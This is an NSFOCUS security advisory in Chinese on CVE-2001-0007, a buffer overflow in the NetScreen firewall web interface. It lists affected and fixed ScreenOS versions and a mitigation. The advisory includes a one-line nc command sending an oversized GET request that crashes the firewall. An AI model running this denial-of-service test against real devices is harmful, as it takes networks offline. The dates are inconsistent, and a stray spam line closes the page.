首頁 -> 安全研究

安全研究

安全公告
綠盟科技安全公告(SA2001-01)

NSFOCUS安全小組([email protected])
http://www.nsfocus.com

NetScreen 防火墻Web管理界面緩沖區溢出漏洞

發布日期:2000-01-09

CVE ID:CVE-2001-0007

受影響的軟件及系統:
====================
ScreenOS release 1.73r1
       - NetScreen-1000
ScreenOS release 2.01r6
       - NetScreen-10/100
ScreenOS release 2.10r3
       - NetScreen-5
ScreenOS release 2.5r1
       - NetScreen-5/10/100

未受影響的軟件及系統:
======================
ScreenOS release 1.73r2
       - NetScreen-1000
ScreenOS release 2.01r7
       - NetScreen-10/100
ScreenOS release 2.10r4
       - NetScreen-5
ScreenOS release 2.5r2
       - NetScreen-5/10/100

綜述:
======
NSFOCUS 安全小組發現NetScreen防火墻的Web管理界面存在一個緩沖區溢出漏洞。利用這個漏洞,惡意用戶可以對受影響的系統發動遠程拒絕服務攻擊,造成防火墻崩潰。

分析:
======
NetScreen防火墻是一款流行的商用防火墻產品。它提供了一個Web管理界面(缺省是80端口),管理員可以使用瀏覽器來進行防火墻配置。然而,由于缺乏對用戶輸入URL的長度檢查,如果攻擊者提供一個超長的URL,可能導致一個緩沖區溢出的發生。NetScreen防火墻將崩潰, 有通過防火墻建立的連接都被中斷,防火墻也不再響應任何新的連接請求。必須手工重啟動防火墻才能恢復其正常功能。

攻擊者并不需要登錄進防火墻就可發動攻擊。

此問題影響所有ScreeOS的當前版本,包括1.73r1, 2.0r6, 2.1r3 和2.5r1。如果防火墻打開了Web管理選項,就可能受到此問題影響。

測試方法:
==========
如果提交的URL超過1220個字符,NetScreen防火墻就將崩潰:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80

在防火墻的控制臺上可以看到類似下列信息:

****************************** EXCEPTION ******************************

Bus error execption (data reference: load or store)

EPC   = 0x8009AA1C,   SR    = 0x34501007,   Cause = 0x0080001C

防火墻將停止響應。

解決方法:
==========
NSFOCUS建議您在沒有獲得并安裝補丁程序之前,暫時禁止Web管理功能或者指定只允許從可信任的主機進行管理。

廠商狀態:
==========
我們已經在2000年12月19日將這個問題通報給了NetScreen公司,NetScreen于2000年12月26日提供了下列版本的ScreenOS,它們已經解決了此問題:
ScreenOS 1.73r2  - NetScreen-1000
ScreenOS 2.10r4  - NetScreen-5
ScreenOS 2.01r7  - NetScreen-10/100
ScreenOS 2.5.0r2 - NetScreen-5/10/100

您可以登錄下列地址來下載最新版本的軟件:
http://www.netscreen.com/support/updates.html或直接與NetScreen技術支持中心(mailto:[email protected])聯系以獲取升級軟件。

聲 明
==========

本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。

關于綠盟科技
============

綠盟科技(NSFOCUS Co., Ltd.)是中國網絡安全領域的領導企業,致力于網絡和系統安全問題的研究、高端網絡安全產品的研發、銷售與網絡安全服務,在入侵檢測/保護、遠程評估、 DDoS攻擊防護等方面提供具有國際競爭能力的先進產品,是國內最具安全服務經驗的專業公司。有關綠盟科技的詳情請參見: http://www.nsfocus.com

© 2020 綠盟科技
浙江快乐彩网上投注